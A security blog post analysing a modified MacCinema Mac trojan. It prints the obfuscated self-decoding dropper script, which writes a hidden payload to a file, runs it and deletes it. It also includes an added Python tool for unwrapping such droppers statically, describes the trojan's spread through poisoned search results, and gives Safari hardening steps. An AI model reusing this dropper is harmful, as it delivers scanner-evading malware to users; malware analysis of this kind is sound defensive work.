
Updated MacCinema

Last week I spotted a modified version of MacCinema. The change was not significant; the modification was made purely to evade scanner detection.

The script looks like this:

#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' |  sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
dne
`
``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H
"%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M
****content removed****
LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M
BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M
agazagiz 666 lala
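To see what the pipeline above hides without running it, here is an added example (not the malware author's code and not from the original post) that statically reproduces each stage of the dropper on a constructed sample whose payload is a harmless one-line script. The tail count of 4, the sample blob and the `script_type` parameter (mirroring the dropper's `$type`) are assumptions for the demo.

```python
"""Static unwrapper for the MacCinema-style dropper shown above (added
example, not the malware's code). It replays the de-obfuscation pipeline
offline so the embedded payload can be inspected, never executed."""
import binascii
import re

# Constructed sample: same layering as the page's script (tail -N of the
# file, 'lala' -> 'nigeb', per-line character reversal, tail -r, uudecode).
# The pipeline body is elided; only the 'tail -N $0' count is parsed.
SAMPLE_DROPPER = """#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -4 $0 | sed 's/lala/nigeb/' | ... (pipeline as above)
dne
`
``@"UYV9@0V<B!R8AU69L!'<A!R;H-696
agazagiz 666 lala
"""


def extract_payload(dropper: str, script_type: str = "0") -> str:
    """Return the plaintext the dropper would write to `uname -p` and run.
    script_type mirrors $type: "0" without an argument, "1" with one."""
    m = re.search(r"tail -(\d+) \$0", dropper)
    if not m:
        raise ValueError("no 'tail -N $0' self-read found in first line")
    tail = dropper.splitlines()[-int(m.group(1)):]        # tail -N $0
    tail = [l.replace("lala", "nigeb", 1) for l in tail]   # sed 's/lala/nigeb/'
    tail = [l[::-1] for l in tail]                         # sed line-reverse one-liner
    tail = tail[::-1]                                      # tail -r
    if not tail or not tail[0].startswith("begin "):
        raise ValueError("unwrapped data does not start with a uuencode header")
    raw = bytearray()
    for line in tail[1:]:                                  # uudecode -o /dev/stdout
        if line == "end":
            break
        if line.strip() in ("", "`"):                      # empty uu data line
            continue
        raw += binascii.a2b_uu(line.encode("ascii"))
    text = raw.decode("utf-8", errors="replace")
    # The three post-decode seds: first match per line, like sed without /g.
    fixed = []
    for l in text.split("\n"):
        l = l.replace("applemac", "AdobeFlash", 1)
        l = l.replace("bsd", "7037", 1)
        l = l.replace("gnu", script_type, 1)
        fixed.append(l)
    return "\n".join(fixed)


if __name__ == "__main__":
    print(extract_payload(SAMPLE_DROPPER), end="")  # echo AdobeFlash 7037 0
```

On a real sample, replace `SAMPLE_DROPPER` with the file contents and read the recovered script instead of letting the dropper write it to the file named after `uname -p`.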

Anyway, this backdoor trojan is being distributed massively around the internet. It relies on Google SEO, so most users stumble onto these malicious sites from Google search results.

Some sites lure Mac users by promising free downloads of full versions of software, cracks, serials, activators, generators, keys and fixes, just like the screenshot below.

[screenshot: crack]

…while others link to Mac videos, like the PornTube site below.

[screenshot: Porntube]

Some malware-serving sites are a bit more aggressive: they do not ask the user to download the DMG file; instead it is downloaded and mounted automatically, because that behaviour is turned on by default. You can disable the automatic mounting by following these steps:

1. Open Safari

2. Open “Preferences” under the “Safari” menu

3. Click on the “General” tab

4. Un-check the “Open ’safe’ files after downloading” box

5. Close Safari’s preferences

These instructions have been discussed here previously.

Stay safe!

  1. Antoine B.
    June 18, 2009 at 3:57 pm

    Hi,

    How is MacCinema installed in the case of the Album Cover Application? The application just needs to be dragged into the Applications folder; there is no installer package like before! Is it also possible that my Norton cannot see that?

    Big problem here!
